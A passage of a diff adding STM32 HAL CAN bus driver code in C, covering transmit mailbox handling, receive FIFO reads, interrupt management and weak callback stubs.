WRITE_REG(hcan->Instance->sTxMailBox[transmitmailbox].TDHR, + ((uint32_t)aData[7] << CAN_TDH0R_DATA7_Pos) | + ((uint32_t)aData[6] << CAN_TDH0R_DATA6_Pos) | + ((uint32_t)aData[5] << CAN_TDH0R_DATA5_Pos) | + ((uint32_t)aData[4] << CAN_TDH0R_DATA4_Pos)); + WRITE_REG(hcan->Instance->sTxMailBox[transmitmailbox].TDLR, + ((uint32_t)aData[3] << CAN_TDL0R_DATA3_Pos) | + ((uint32_t)aData[2] << CAN_TDL0R_DATA2_Pos) | + ((uint32_t)aData[1] << CAN_TDL0R_DATA1_Pos) | + ((uint32_t)aData[0] << CAN_TDL0R_DATA0_Pos)); + + /* Request transmission */ + SET_BIT(hcan->Instance->sTxMailBox[transmitmailbox].TIR, CAN_TI0R_TXRQ); + + /* Return function status */ + return HAL_OK; + } + else + { + /* Update error code */ + hcan->ErrorCode |= HAL_CAN_ERROR_PARAM; + + return HAL_ERROR; + } + } + else + { + /* Update error code */ + hcan->ErrorCode |= HAL_CAN_ERROR_NOT_INITIALIZED; + + return HAL_ERROR; + } +} + +/** + * @brief Abort transmission requests + * @param hcan pointer to an CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @param TxMailboxes List of the Tx Mailboxes to abort. + * This parameter can be any combination of @arg CAN_Tx_Mailboxes. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_CAN_AbortTxRequest(CAN_HandleTypeDef *hcan, uint32_t TxMailboxes) +{ + HAL_CAN_StateTypeDef state = hcan->State; + + /* Check function parameters */ + assert_param(IS_CAN_TX_MAILBOX_LIST(TxMailboxes)); + + if ((state == HAL_CAN_STATE_READY) || + (state == HAL_CAN_STATE_LISTENING)) + { + /* Check Tx Mailbox 0 */ + if ((TxMailboxes & CAN_TX_MAILBOX0) != 0U) + { + /* Add cancellation request for Tx Mailbox 0 */ + SET_BIT(hcan->Instance->TSR, CAN_TSR_ABRQ0); + } + + /* Check Tx Mailbox 1 */ + if ((TxMailboxes & CAN_TX_MAILBOX1) != 0U) + { + /* Add cancellation request for Tx Mailbox 1 */ + SET_BIT(hcan->Instance->TSR, CAN_TSR_ABRQ1); + } + + /* Check Tx Mailbox 2 */ + if ((TxMailboxes & CAN_TX_MAILBOX2) != 0U) + { + /* Add cancellation request for Tx Mailbox 2 */ + SET_BIT(hcan->Instance->TSR, CAN_TSR_ABRQ2); + } + + /* Return function status */ + return HAL_OK; + } + else + { + /* Update error code */ + hcan->ErrorCode |= HAL_CAN_ERROR_NOT_INITIALIZED; + + return HAL_ERROR; + } +} + +/** + * @brief Return Tx Mailboxes free level: number of free Tx Mailboxes. + * @param hcan pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @retval Number of free Tx Mailboxes. + */ +uint32_t HAL_CAN_GetTxMailboxesFreeLevel(CAN_HandleTypeDef *hcan) +{ + uint32_t freelevel = 0U; + HAL_CAN_StateTypeDef state = hcan->State; + + if ((state == HAL_CAN_STATE_READY) || + (state == HAL_CAN_STATE_LISTENING)) + { + /* Check Tx Mailbox 0 status */ + if ((hcan->Instance->TSR & CAN_TSR_TME0) != 0U) + { + freelevel++; + } + + /* Check Tx Mailbox 1 status */ + if ((hcan->Instance->TSR & CAN_TSR_TME1) != 0U) + { + freelevel++; + } + + /* Check Tx Mailbox 2 status */ + if ((hcan->Instance->TSR & CAN_TSR_TME2) != 0U) + { + freelevel++; + } + } + + /* Return Tx Mailboxes free level */ + return freelevel; +} + +/** + * @brief Check if a transmission request is pending on the selected Tx + * Mailboxes. + * @param hcan pointer to an CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @param TxMailboxes List of Tx Mailboxes to check. + * This parameter can be any combination of @arg CAN_Tx_Mailboxes. + * @retval Status + * - 0 : No pending transmission request on any selected Tx Mailboxes. + * - 1 : Pending transmission request on at least one of the selected + * Tx Mailbox. + */ +uint32_t HAL_CAN_IsTxMessagePending(CAN_HandleTypeDef *hcan, uint32_t TxMailboxes) +{ + uint32_t status = 0U; + HAL_CAN_StateTypeDef state = hcan->State; + + /* Check function parameters */ + assert_param(IS_CAN_TX_MAILBOX_LIST(TxMailboxes)); + + if ((state == HAL_CAN_STATE_READY) || + (state == HAL_CAN_STATE_LISTENING)) + { + /* Check pending transmission request on the selected Tx Mailboxes */ + if ((hcan->Instance->TSR & (TxMailboxes << CAN_TSR_TME0_Pos)) != (TxMailboxes << CAN_TSR_TME0_Pos)) + { + status = 1U; + } + } + + /* Return status */ + return status; +} + +/** + * @brief Return timestamp of Tx message sent, if time triggered communication + mode is enabled. + * @param hcan pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @param TxMailbox Tx Mailbox where the timestamp of message sent will be + * read. + * This parameter can be one value of @arg CAN_Tx_Mailboxes. + * @retval Timestamp of message sent from Tx Mailbox. + */ +uint32_t HAL_CAN_GetTxTimestamp(CAN_HandleTypeDef *hcan, uint32_t TxMailbox) +{ + uint32_t timestamp = 0U; + uint32_t transmitmailbox; + HAL_CAN_StateTypeDef state = hcan->State; + + /* Check function parameters */ + assert_param(IS_CAN_TX_MAILBOX(TxMailbox)); + + if ((state == HAL_CAN_STATE_READY) || + (state == HAL_CAN_STATE_LISTENING)) + { + /* Select the Tx mailbox */ + transmitmailbox = POSITION_VAL(TxMailbox); + + /* Get timestamp */ + timestamp = (hcan->Instance->sTxMailBox[transmitmailbox].TDTR & CAN_TDT0R_TIME) >> CAN_TDT0R_TIME_Pos; + } + + /* Return the timestamp */ + return timestamp; +} + +/** + * @brief Get an CAN frame from the Rx FIFO zone into the message RAM. + * @param hcan pointer to an CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @param RxFifo Fifo number of the received message to be read. + * This parameter can be a value of @arg CAN_receive_FIFO_number. + * @param pHeader pointer to a CAN_RxHeaderTypeDef structure where the header + * of the Rx frame will be stored. + * @param aData array where the payload of the Rx frame will be stored. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_CAN_GetRxMessage(CAN_HandleTypeDef *hcan, uint32_t RxFifo, CAN_RxHeaderTypeDef *pHeader, uint8_t aData[]) +{ + HAL_CAN_StateTypeDef state = hcan->State; + + assert_param(IS_CAN_RX_FIFO(RxFifo)); + + if ((state == HAL_CAN_STATE_READY) || + (state == HAL_CAN_STATE_LISTENING)) + { + /* Check the Rx FIFO */ + if (RxFifo == CAN_RX_FIFO0) /* Rx element is assigned to Rx FIFO 0 */ + { + /* Check that the Rx FIFO 0 is not empty */ + if ((hcan->Instance->RF0R & CAN_RF0R_FMP0) == 0U) + { + /* Update error code */ + hcan->ErrorCode |= HAL_CAN_ERROR_PARAM; + + return HAL_ERROR; + } + } + else /* Rx element is assigned to Rx FIFO 1 */ + { + /* Check that the Rx FIFO 1 is not empty */ + if ((hcan->Instance->RF1R & CAN_RF1R_FMP1) == 0U) + { + /* Update error code */ + hcan->ErrorCode |= HAL_CAN_ERROR_PARAM; + + return HAL_ERROR; + } + } + + /* Get the header */ + pHeader->IDE = CAN_RI0R_IDE & hcan->Instance->sFIFOMailBox[RxFifo].RIR; + if (pHeader->IDE == CAN_ID_STD) + { + pHeader->StdId = (CAN_RI0R_STID & hcan->Instance->sFIFOMailBox[RxFifo].RIR) >> CAN_TI0R_STID_Pos; + } + else + { + pHeader->ExtId = ((CAN_RI0R_EXID | CAN_RI0R_STID) & hcan->Instance->sFIFOMailBox[RxFifo].RIR) >> CAN_RI0R_EXID_Pos; + } + pHeader->RTR = (CAN_RI0R_RTR & hcan->Instance->sFIFOMailBox[RxFifo].RIR); + pHeader->DLC = (CAN_RDT0R_DLC & hcan->Instance->sFIFOMailBox[RxFifo].RDTR) >> CAN_RDT0R_DLC_Pos; + pHeader->FilterMatchIndex = (CAN_RDT0R_FMI & hcan->Instance->sFIFOMailBox[RxFifo].RDTR) >> CAN_RDT0R_FMI_Pos; + pHeader->Timestamp = (CAN_RDT0R_TIME & hcan->Instance->sFIFOMailBox[RxFifo].RDTR) >> CAN_RDT0R_TIME_Pos; + + /* Get the data */ + aData[0] = (uint8_t)((CAN_RDL0R_DATA0 & hcan->Instance->sFIFOMailBox[RxFifo].RDLR) >> CAN_RDL0R_DATA0_Pos); + aData[1] = (uint8_t)((CAN_RDL0R_DATA1 & hcan->Instance->sFIFOMailBox[RxFifo].RDLR) >> CAN_RDL0R_DATA1_Pos); + aData[2] = (uint8_t)((CAN_RDL0R_DATA2 & hcan->Instance->sFIFOMailBox[RxFifo].RDLR) >> CAN_RDL0R_DATA2_Pos); + aData[3] = (uint8_t)((CAN_RDL0R_DATA3 & hcan->Instance->sFIFOMailBox[RxFifo].RDLR) >> CAN_RDL0R_DATA3_Pos); + aData[4] = (uint8_t)((CAN_RDH0R_DATA4 & hcan->Instance->sFIFOMailBox[RxFifo].RDHR) >> CAN_RDH0R_DATA4_Pos); + aData[5] = (uint8_t)((CAN_RDH0R_DATA5 & hcan->Instance->sFIFOMailBox[RxFifo].RDHR) >> CAN_RDH0R_DATA5_Pos); + aData[6] = (uint8_t)((CAN_RDH0R_DATA6 & hcan->Instance->sFIFOMailBox[RxFifo].RDHR) >> CAN_RDH0R_DATA6_Pos); + aData[7] = (uint8_t)((CAN_RDH0R_DATA7 & hcan->Instance->sFIFOMailBox[RxFifo].RDHR) >> CAN_RDH0R_DATA7_Pos); + + /* Release the FIFO */ + if (RxFifo == CAN_RX_FIFO0) /* Rx element is assigned to Rx FIFO 0 */ + { + /* Release RX FIFO 0 */ + SET_BIT(hcan->Instance->RF0R, CAN_RF0R_RFOM0); + } + else /* Rx element is assigned to Rx FIFO 1 */ + { + /* Release RX FIFO 1 */ + SET_BIT(hcan->Instance->RF1R, CAN_RF1R_RFOM1); + } + + /* Return function status */ + return HAL_OK; + } + else + { + /* Update error code */ + hcan->ErrorCode |= HAL_CAN_ERROR_NOT_INITIALIZED; + + return HAL_ERROR; + } +} + +/** + * @brief Return Rx FIFO fill level. + * @param hcan pointer to an CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @param RxFifo Rx FIFO. + * This parameter can be a value of @arg CAN_receive_FIFO_number. + * @retval Number of messages available in Rx FIFO. + */ +uint32_t HAL_CAN_GetRxFifoFillLevel(CAN_HandleTypeDef *hcan, uint32_t RxFifo) +{ + uint32_t filllevel = 0U; + HAL_CAN_StateTypeDef state = hcan->State; + + /* Check function parameters */ + assert_param(IS_CAN_RX_FIFO(RxFifo)); + + if ((state == HAL_CAN_STATE_READY) || + (state == HAL_CAN_STATE_LISTENING)) + { + if (RxFifo == CAN_RX_FIFO0) + { + filllevel = hcan->Instance->RF0R & CAN_RF0R_FMP0; + } + else /* RxFifo == CAN_RX_FIFO1 */ + { + filllevel = hcan->Instance->RF1R & CAN_RF1R_FMP1; + } + } + + /* Return Rx FIFO fill level */ + return filllevel; +} + +/** + * @} + */ + +/** @defgroup CAN_Exported_Functions_Group4 Interrupts management + * @brief Interrupts management + * +@verbatim + ============================================================================== + ##### Interrupts management ##### + ============================================================================== + [..] This section provides functions allowing to: + (+) HAL_CAN_ActivateNotification : Enable interrupts + (+) HAL_CAN_DeactivateNotification : Disable interrupts + (+) HAL_CAN_IRQHandler : Handles CAN interrupt request + +@endverbatim + * @{ + */ + +/** + * @brief Enable interrupts. + * @param hcan pointer to an CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @param ActiveITs indicates which interrupts will be enabled. + * This parameter can be any combination of @arg CAN_Interrupts. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_CAN_ActivateNotification(CAN_HandleTypeDef *hcan, uint32_t ActiveITs) +{ + HAL_CAN_StateTypeDef state = hcan->State; + + /* Check function parameters */ + assert_param(IS_CAN_IT(ActiveITs)); + + if ((state == HAL_CAN_STATE_READY) || + (state == HAL_CAN_STATE_LISTENING)) + { + /* Enable the selected interrupts */ + __HAL_CAN_ENABLE_IT(hcan, ActiveITs); + + /* Return function status */ + return HAL_OK; + } + else + { + /* Update error code */ + hcan->ErrorCode |= HAL_CAN_ERROR_NOT_INITIALIZED; + + return HAL_ERROR; + } +} + +/** + * @brief Disable interrupts. + * @param hcan pointer to an CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @param InactiveITs indicates which interrupts will be disabled. + * This parameter can be any combination of @arg CAN_Interrupts. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_CAN_DeactivateNotification(CAN_HandleTypeDef *hcan, uint32_t InactiveITs) +{ + HAL_CAN_StateTypeDef state = hcan->State; + + /* Check function parameters */ + assert_param(IS_CAN_IT(InactiveITs)); + + if ((state == HAL_CAN_STATE_READY) || + (state == HAL_CAN_STATE_LISTENING)) + { + /* Disable the selected interrupts */ + __HAL_CAN_DISABLE_IT(hcan, InactiveITs); + + /* Return function status */ + return HAL_OK; + } + else + { + /* Update error code */ + hcan->ErrorCode |= HAL_CAN_ERROR_NOT_INITIALIZED; + + return HAL_ERROR; + } +} + +/** + * @brief Handles CAN interrupt request + * @param hcan pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @retval None + */ +void HAL_CAN_IRQHandler(CAN_HandleTypeDef *hcan) +{ + uint32_t errorcode = HAL_CAN_ERROR_NONE; + uint32_t interrupts = READ_REG(hcan->Instance->IER); + uint32_t msrflags = READ_REG(hcan->Instance->MSR); + uint32_t tsrflags = READ_REG(hcan->Instance->TSR); + uint32_t rf0rflags = READ_REG(hcan->Instance->RF0R); + uint32_t rf1rflags = READ_REG(hcan->Instance->RF1R); + uint32_t esrflags = READ_REG(hcan->Instance->ESR); + + /* Transmit Mailbox empty interrupt management *****************************/ + if ((interrupts & CAN_IT_TX_MAILBOX_EMPTY) != 0U) + { + /* Transmit Mailbox 0 management *****************************************/ + if ((tsrflags & CAN_TSR_RQCP0) != 0U) + { + /* Clear the Transmission Complete flag (and TXOK0,ALST0,TERR0 bits) */ + __HAL_CAN_CLEAR_FLAG(hcan, CAN_FLAG_RQCP0); + + if ((tsrflags & CAN_TSR_TXOK0) != 0U) + { + /* Transmission Mailbox 0 complete callback */ +#if USE_HAL_CAN_REGISTER_CALLBACKS == 1 + /* Call registered callback*/ + hcan->TxMailbox0CompleteCallback(hcan); +#else + /* Call weak (surcharged) callback */ + HAL_CAN_TxMailbox0CompleteCallback(hcan); +#endif /* USE_HAL_CAN_REGISTER_CALLBACKS */ + } + else + { + if ((tsrflags & CAN_TSR_ALST0) != 0U) + { + /* Update error code */ + errorcode |= HAL_CAN_ERROR_TX_ALST0; + } + else if ((tsrflags & CAN_TSR_TERR0) != 0U) + { + /* Update error code */ + errorcode |= HAL_CAN_ERROR_TX_TERR0; + } + else + { + /* Transmission Mailbox 0 abort callback */ +#if USE_HAL_CAN_REGISTER_CALLBACKS == 1 + /* Call registered callback*/ + hcan->TxMailbox0AbortCallback(hcan); +#else + /* Call weak (surcharged) callback */ + HAL_CAN_TxMailbox0AbortCallback(hcan); +#endif /* USE_HAL_CAN_REGISTER_CALLBACKS */ + } + } + } + + /* Transmit Mailbox 1 management *****************************************/ + if ((tsrflags & CAN_TSR_RQCP1) != 0U) + { + /* Clear the Transmission Complete flag (and TXOK1,ALST1,TERR1 bits) */ + __HAL_CAN_CLEAR_FLAG(hcan, CAN_FLAG_RQCP1); + + if ((tsrflags & CAN_TSR_TXOK1) != 0U) + { + /* Transmission Mailbox 1 complete callback */ +#if USE_HAL_CAN_REGISTER_CALLBACKS == 1 + /* Call registered callback*/ + hcan->TxMailbox1CompleteCallback(hcan); +#else + /* Call weak (surcharged) callback */ + HAL_CAN_TxMailbox1CompleteCallback(hcan); +#endif /* USE_HAL_CAN_REGISTER_CALLBACKS */ + } + else + { + if ((tsrflags & CAN_TSR_ALST1) != 0U) + { + /* Update error code */ + errorcode |= HAL_CAN_ERROR_TX_ALST1; + } + else if ((tsrflags & CAN_TSR_TERR1) != 0U) + { + /* Update error code */ + errorcode |= HAL_CAN_ERROR_TX_TERR1; + } + else + { + /* Transmission Mailbox 1 abort callback */ +#if USE_HAL_CAN_REGISTER_CALLBACKS == 1 + /* Call registered callback*/ + hcan->TxMailbox1AbortCallback(hcan); +#else + /* Call weak (surcharged) callback */ + HAL_CAN_TxMailbox1AbortCallback(hcan); +#endif /* USE_HAL_CAN_REGISTER_CALLBACKS */ + } + } + } + + /* Transmit Mailbox 2 management *****************************************/ + if ((tsrflags & CAN_TSR_RQCP2) != 0U) + { + /* Clear the Transmission Complete flag (and TXOK2,ALST2,TERR2 bits) */ + __HAL_CAN_CLEAR_FLAG(hcan, CAN_FLAG_RQCP2); + + if ((tsrflags & CAN_TSR_TXOK2) != 0U) + { + /* Transmission Mailbox 2 complete callback */ +#if USE_HAL_CAN_REGISTER_CALLBACKS == 1 + /* Call registered callback*/ + hcan->TxMailbox2CompleteCallback(hcan); +#else + /* Call weak (surcharged) callback */ + HAL_CAN_TxMailbox2CompleteCallback(hcan); +#endif /* USE_HAL_CAN_REGISTER_CALLBACKS */ + } + else + { + if ((tsrflags & CAN_TSR_ALST2) != 0U) + { + /* Update error code */ + errorcode |= HAL_CAN_ERROR_TX_ALST2; + } + else if ((tsrflags & CAN_TSR_TERR2) != 0U) + { + /* Update error code */ + errorcode |= HAL_CAN_ERROR_TX_TERR2; + } + else + { + /* Transmission Mailbox 2 abort callback */ +#if USE_HAL_CAN_REGISTER_CALLBACKS == 1 + /* Call registered callback*/ + hcan->TxMailbox2AbortCallback(hcan); +#else + /* Call weak (surcharged) callback */ + HAL_CAN_TxMailbox2AbortCallback(hcan); +#endif /* USE_HAL_CAN_REGISTER_CALLBACKS */ + } + } + } + } + + /* Receive FIFO 0 overrun interrupt management *****************************/ + if ((interrupts & CAN_IT_RX_FIFO0_OVERRUN) != 0U) + { + if ((rf0rflags & CAN_RF0R_FOVR0) != 0U) + { + /* Set CAN error code to Rx Fifo 0 overrun error */ + errorcode |= HAL_CAN_ERROR_RX_FOV0; + + /* Clear FIFO0 Overrun Flag */ + __HAL_CAN_CLEAR_FLAG(hcan, CAN_FLAG_FOV0); + } + } + + /* Receive FIFO 0 full interrupt management ********************************/ + if ((interrupts & CAN_IT_RX_FIFO0_FULL) != 0U) + { + if ((rf0rflags & CAN_RF0R_FULL0) != 0U) + { + /* Clear FIFO 0 full Flag */ + __HAL_CAN_CLEAR_FLAG(hcan, CAN_FLAG_FF0); + + /* Receive FIFO 0 full Callback */ +#if USE_HAL_CAN_REGISTER_CALLBACKS == 1 + /* Call registered callback*/ + hcan->RxFifo0FullCallback(hcan); +#else + /* Call weak (surcharged) callback */ + HAL_CAN_RxFifo0FullCallback(hcan); +#endif /* USE_HAL_CAN_REGISTER_CALLBACKS */ + } + } + + /* Receive FIFO 0 message pending interrupt management *********************/ + if ((interrupts & CAN_IT_RX_FIFO0_MSG_PENDING) != 0U) + { + /* Check if message is still pending */ + if ((hcan->Instance->RF0R & CAN_RF0R_FMP0) != 0U) + { + /* Receive FIFO 0 message pending Callback */ +#if USE_HAL_CAN_REGISTER_CALLBACKS == 1 + /* Call registered callback*/ + hcan->RxFifo0MsgPendingCallback(hcan); +#else + /* Call weak (surcharged) callback */ + HAL_CAN_RxFifo0MsgPendingCallback(hcan); +#endif /* USE_HAL_CAN_REGISTER_CALLBACKS */ + } + } + + /* Receive FIFO 1 overrun interrupt management *****************************/ + if ((interrupts & CAN_IT_RX_FIFO1_OVERRUN) != 0U) + { + if ((rf1rflags & CAN_RF1R_FOVR1) != 0U) + { + /* Set CAN error code to Rx Fifo 1 overrun error */ + errorcode |= HAL_CAN_ERROR_RX_FOV1; + + /* Clear FIFO1 Overrun Flag */ + __HAL_CAN_CLEAR_FLAG(hcan, CAN_FLAG_FOV1); + } + } + + /* Receive FIFO 1 full interrupt management ********************************/ + if ((interrupts & CAN_IT_RX_FIFO1_FULL) != 0U) + { + if ((rf1rflags & CAN_RF1R_FULL1) != 0U) + { + /* Clear FIFO 1 full Flag */ + __HAL_CAN_CLEAR_FLAG(hcan, CAN_FLAG_FF1); + + /* Receive FIFO 1 full Callback */ +#if USE_HAL_CAN_REGISTER_CALLBACKS == 1 + /* Call registered callback*/ + hcan->RxFifo1FullCallback(hcan); +#else + /* Call weak (surcharged) callback */ + HAL_CAN_RxFifo1FullCallback(hcan); +#endif /* USE_HAL_CAN_REGISTER_CALLBACKS */ + } + } + + /* Receive FIFO 1 message pending interrupt management *********************/ + if ((interrupts & CAN_IT_RX_FIFO1_MSG_PENDING) != 0U) + { + /* Check if message is still pending */ + if ((hcan->Instance->RF1R & CAN_RF1R_FMP1) != 0U) + { + /* Receive FIFO 1 message pending Callback */ +#if USE_HAL_CAN_REGISTER_CALLBACKS == 1 + /* Call registered callback*/ + hcan->RxFifo1MsgPendingCallback(hcan); +#else + /* Call weak (surcharged) callback */ + HAL_CAN_RxFifo1MsgPendingCallback(hcan); +#endif /* USE_HAL_CAN_REGISTER_CALLBACKS */ + } + } + + /* Sleep interrupt management *********************************************/ + if ((interrupts & CAN_IT_SLEEP_ACK) != 0U) + { + if ((msrflags & CAN_MSR_SLAKI) != 0U) + { + /* Clear Sleep interrupt Flag */ + __HAL_CAN_CLEAR_FLAG(hcan, CAN_FLAG_SLAKI); + + /* Sleep Callback */ +#if USE_HAL_CAN_REGISTER_CALLBACKS == 1 + /* Call registered callback*/ + hcan->SleepCallback(hcan); +#else + /* Call weak (surcharged) callback */ + HAL_CAN_SleepCallback(hcan); +#endif /* USE_HAL_CAN_REGISTER_CALLBACKS */ + } + } + + /* WakeUp interrupt management *********************************************/ + if ((interrupts & CAN_IT_WAKEUP) != 0U) + { + if ((msrflags & CAN_MSR_WKUI) != 0U) + { + /* Clear WakeUp Flag */ + __HAL_CAN_CLEAR_FLAG(hcan, CAN_FLAG_WKU); + + /* WakeUp Callback */ +#if USE_HAL_CAN_REGISTER_CALLBACKS == 1 + /* Call registered callback*/ + hcan->WakeUpFromRxMsgCallback(hcan); +#else + /* Call weak (surcharged) callback */ + HAL_CAN_WakeUpFromRxMsgCallback(hcan); +#endif /* USE_HAL_CAN_REGISTER_CALLBACKS */ + } + } + + /* Error interrupts management *********************************************/ + if ((interrupts & CAN_IT_ERROR) != 0U) + { + if ((msrflags & CAN_MSR_ERRI) != 0U) + { + /* Check Error Warning Flag */ + if (((interrupts & CAN_IT_ERROR_WARNING) != 0U) && + ((esrflags & CAN_ESR_EWGF) != 0U)) + { + /* Set CAN error code to Error Warning */ + errorcode |= HAL_CAN_ERROR_EWG; + + /* No need for clear of Error Warning Flag as read-only */ + } + + /* Check Error Passive Flag */ + if (((interrupts & CAN_IT_ERROR_PASSIVE) != 0U) && + ((esrflags & CAN_ESR_EPVF) != 0U)) + { + /* Set CAN error code to Error Passive */ + errorcode |= HAL_CAN_ERROR_EPV; + + /* No need for clear of Error Passive Flag as read-only */ + } + + /* Check Bus-off Flag */ + if (((interrupts & CAN_IT_BUSOFF) != 0U) && + ((esrflags & CAN_ESR_BOFF) != 0U)) + { + /* Set CAN error code to Bus-Off */ + errorcode |= HAL_CAN_ERROR_BOF; + + /* No need for clear of Error Bus-Off as read-only */ + } + + /* Check Last Error Code Flag */ + if (((interrupts & CAN_IT_LAST_ERROR_CODE) != 0U) && + ((esrflags & CAN_ESR_LEC) != 0U)) + { + switch (esrflags & CAN_ESR_LEC) + { + case (CAN_ESR_LEC_0): + /* Set CAN error code to Stuff error */ + errorcode |= HAL_CAN_ERROR_STF; + break; + case (CAN_ESR_LEC_1): + /* Set CAN error code to Form error */ + errorcode |= HAL_CAN_ERROR_FOR; + break; + case (CAN_ESR_LEC_1 | CAN_ESR_LEC_0): + /* Set CAN error code to Acknowledgement error */ + errorcode |= HAL_CAN_ERROR_ACK; + break; + case (CAN_ESR_LEC_2): + /* Set CAN error code to Bit recessive error */ + errorcode |= HAL_CAN_ERROR_BR; + break; + case (CAN_ESR_LEC_2 | CAN_ESR_LEC_0): + /* Set CAN error code to Bit Dominant error */ + errorcode |= HAL_CAN_ERROR_BD; + break; + case (CAN_ESR_LEC_2 | CAN_ESR_LEC_1): + /* Set CAN error code to CRC error */ + errorcode |= HAL_CAN_ERROR_CRC; + break; + default: + break; + } + + /* Clear Last error code Flag */ + CLEAR_BIT(hcan->Instance->ESR, CAN_ESR_LEC); + } + } + + /* Clear ERRI Flag */ + __HAL_CAN_CLEAR_FLAG(hcan, CAN_FLAG_ERRI); + } + + /* Call the Error call Back in case of Errors */ + if (errorcode != HAL_CAN_ERROR_NONE) + { + /* Update error code in handle */ + hcan->ErrorCode |= errorcode; + + /* Call Error callback function */ +#if USE_HAL_CAN_REGISTER_CALLBACKS == 1 + /* Call registered callback*/ + hcan->ErrorCallback(hcan); +#else + /* Call weak (surcharged) callback */ + HAL_CAN_ErrorCallback(hcan); +#endif /* USE_HAL_CAN_REGISTER_CALLBACKS */ + } +} + +/** + * @} + */ + +/** @defgroup CAN_Exported_Functions_Group5 Callback functions + * @brief CAN Callback functions + * +@verbatim + ============================================================================== + ##### Callback functions ##### + ============================================================================== + [..] + This subsection provides the following callback functions: + (+) HAL_CAN_TxMailbox0CompleteCallback + (+) HAL_CAN_TxMailbox1CompleteCallback + (+) HAL_CAN_TxMailbox2CompleteCallback + (+) HAL_CAN_TxMailbox0AbortCallback + (+) HAL_CAN_TxMailbox1AbortCallback + (+) HAL_CAN_TxMailbox2AbortCallback + (+) HAL_CAN_RxFifo0MsgPendingCallback + (+) HAL_CAN_RxFifo0FullCallback + (+) HAL_CAN_RxFifo1MsgPendingCallback + (+) HAL_CAN_RxFifo1FullCallback + (+) HAL_CAN_SleepCallback + (+) HAL_CAN_WakeUpFromRxMsgCallback + (+) HAL_CAN_ErrorCallback + +@endverbatim + * @{ + */ + +/** + * @brief Transmission Mailbox 0 complete callback. + * @param hcan pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @retval None + */ +__weak void HAL_CAN_TxMailbox0CompleteCallback(CAN_HandleTypeDef *hcan) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hcan); + + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_CAN_TxMailbox0CompleteCallback could be implemented in the + user file + */ +} + +/** + * @brief Transmission Mailbox 1 complete callback. + * @param hcan pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @retval None + */ +__weak void HAL_CAN_TxMailbox1CompleteCallback(CAN_HandleTypeDef *hcan) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hcan); + + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_CAN_TxMailbox1CompleteCallback could be implemented in the + user file + */ +} + +/** + * @brief Transmission Mailbox 2 complete callback. + * @param hcan pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @retval None + */ +__weak void HAL_CAN_TxMailbox2CompleteCallback(CAN_HandleTypeDef *hcan) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hcan); + + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_CAN_TxMailbox2CompleteCallback could be implemented in the + user file + */ +} + +/** + * @brief Transmission Mailbox 0 Cancellation callback. + * @param hcan pointer to an CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @retval None + */ +__weak void HAL_CAN_TxMailbox0AbortCallback(CAN_HandleTypeDef *hcan) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hcan); + + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_CAN_TxMailbox0AbortCallback could be implemented in the + user file + */ +} + +/** + * @brief Transmission Mailbox 1 Cancellation callback. + * @param hcan pointer to an CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @retval None + */ +__weak void HAL_CAN_TxMailbox1AbortCallback(CAN_HandleTypeDef *hcan) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hcan); + + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_CAN_TxMailbox1AbortCallback could be implemented in the + user file + */ +} + +/** + * @brief Transmission Mailbox 2 Cancellation callback. + * @param hcan pointer to an CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @retval None + */ +__weak void HAL_CAN_TxMailbox2AbortCallback(CAN_HandleTypeDef *hcan) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hcan); + + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_CAN_TxMailbox2AbortCallback could be implemented in the + user file + */ +} + +/** + * @brief Rx FIFO 0 message pending callback. + * @param hcan pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @retval None + */ +__weak void HAL_CAN_RxFifo0MsgPendingCallback(CAN_HandleTypeDef *hcan) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hcan); + + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_CAN_RxFifo0MsgPendingCallback could be implemented in the + user file + */ +} + +/** + * @brief Rx FIFO 0 full callback. + * @param hcan pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @retval None + */ +__weak void HAL_CAN_RxFifo0FullCallback(CAN_HandleTypeDef *hcan) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hcan); + + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_CAN_RxFifo0FullCallback could be implemented in the user + file + */ +} + +/** + * @brief Rx FIFO 1 message pending callback. + * @param hcan pointer to a CAN_HandleTypeDef structure that contains + * the configuration information for the specified CAN. + * @retval None + */ +__weak void HAL_CAN_RxFifo1MsgPendingCallback(CAN_HandleTypeDef *hcan) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hcan); + + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_CAN_RxFifo1MsgPendingCallback could be implemented in the + user file + */ +} + +/** + * @brief Rx FIFO 1 full callback. + * @param hcan pointer to a 